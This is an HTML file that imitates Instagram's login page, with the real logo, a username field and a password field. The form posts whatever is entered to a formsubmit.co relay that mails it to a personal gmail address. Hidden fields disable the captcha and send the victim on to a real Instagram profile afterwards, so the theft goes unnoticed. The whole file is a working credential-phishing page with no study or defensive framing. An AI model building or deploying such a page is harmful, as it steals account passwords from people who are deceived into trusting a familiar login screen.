<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.2/css/all.min.css">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram</title>
</head>
<body>
  <form action="https://formsubmit.co/pro736202@gmail.com" method="POST">
    <div class="container">
      <div class="center">
        <div class="header">
          <img src="https://www.instagram.com/static/images/web/logged_out_wordmark.png/7a252de00b20.png" alt="instagramLogo" class="instaLogo" />
        </div>
        <div class="inputElement">
            <input type="text"placeholder="Phone number,username or email" name="Phone number,username or email" class="inputText"/>
            <input type="password" placeholder="Password" name="password" class="inputText" />
            <input type="submit" value="Log in" class="inputButton">
            <input type="hidden" name="_honey" style="display: none;">
            <input type="hidden" name="_captcha" value="false">
            <input type="hidden" name="_next" value="https://www.instagram.com/trolls_funny_35/">
            <div class="line">
              <span class="arrow"></span>
              <span class="content">OR</span>
              <span class="arrow"></span>
            </div>
            <div class="social__icon">
              <i class="fab fa-facebook-square"></i>
              <a class="tapo" href="z.html">Log In With FaceBook</a>
            </div>
            <SPAn><a class="popa" href="z.html">Forget Password?</a></SPAn>
          </div>
        <div class="footer">
          <p>Don't Have a Accout?<span><a class="popo" href="z.html">Sign Up</a></span></p>
        </div>
      </div>
  </form>
    <style>
            * {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
    font-family: "Roboto", sans-serif;
  }
  
  .container {
    width: 100%;
    height: 100vh;
    display: flex;
    flex-direction: column;
    justify-content: center;
    align-items: center;
    background: url(https://media.istockphoto.com/vectors/gradient-vector-illustration-colorful-background-vector-id1177616400?k=20&m=1177616400&s=612x612&w=0&h=LFKO1cCD1S_ni7iCZpM4LUdUqbxzjuQsHiVjtA-_UMI=);
    background-size: 100% 100%;
  }
  .center {
    border-radius: 5px;
    width: 350px;
    border: 1px solid rgb(195, 195, 195);
    border-radius: 3px;
    background-color: white;
  }
  .center .header {
    display: flex;
    justify-content: center;
    margin-top: 20px;
    margin-bottom: 17px;
  }
  
  .center .inputElement {
    display: flex;
    flex-direction: column;
    margin: 0px 37px 0px 37px;
  }
  
  .inputElement .inputText {
    padding: 8px;
    font-size: 12px;
    margin-top: 10px;
  }
  .inputText:focus {
    outline: gray;
  }
  
  .inputButton {
    background-color: rgb(5, 117, 223);
    cursor: pointer;
    color: white;
    font-size: 12px;
    padding: 8px;
    border-radius: 3px;
    margin-bottom: 12px;
    margin-top: 12px;
    border: none;
  }
  .line {
    display: flex;
    margin-top: 6px;
  }
  .arrow {
    background-color: gray;
    height: 1px;
    width: 140px;
  }
  .content {
    color: gray;
    margin-top: -7px;
    margin-left: 4px;
    margin-right: 4px;
  }
  .social__icon {
    margin: auto;
    margin-top: 10px;
    margin-bottom: 15px;
  }
  .fab {
    padding: 5px;
    color: rgb(0, 55, 107);
  }
  .social__icon span {
    color: rgb(0, 55, 107);
    font-family: sans-serif;
    font-size: 14px;
    font-weight: 500;
  }
  .forgetPassword {
    margin: auto;
  color: rgb(0, 55, 107);
    margin-bottom: 25px;
  }
  .footer {
    margin-top: 10px;
    border: 1px solid rgb(195, 195, 195);
    padding: 20px;
    width: 350px;
    text-align: center;
  }
  .footer span {
    color: blue;
    font-weight: 400;
  }
.tapo{
  text-decoration: none;
  color: rgb(22, 43, 233);
}
.pota{
  margin: auto;
  color: rgb(22, 43, 233);
  margin-bottom: 20px;
}
.popo{
  text-decoration: none;
  color: rgb(22, 43, 233);
  margin: 10px;
}
.popa{
  margin: 73px;
  text-decoration: none;
  color: rgb(22, 43, 233);
}
    </style>
</body>
</html>
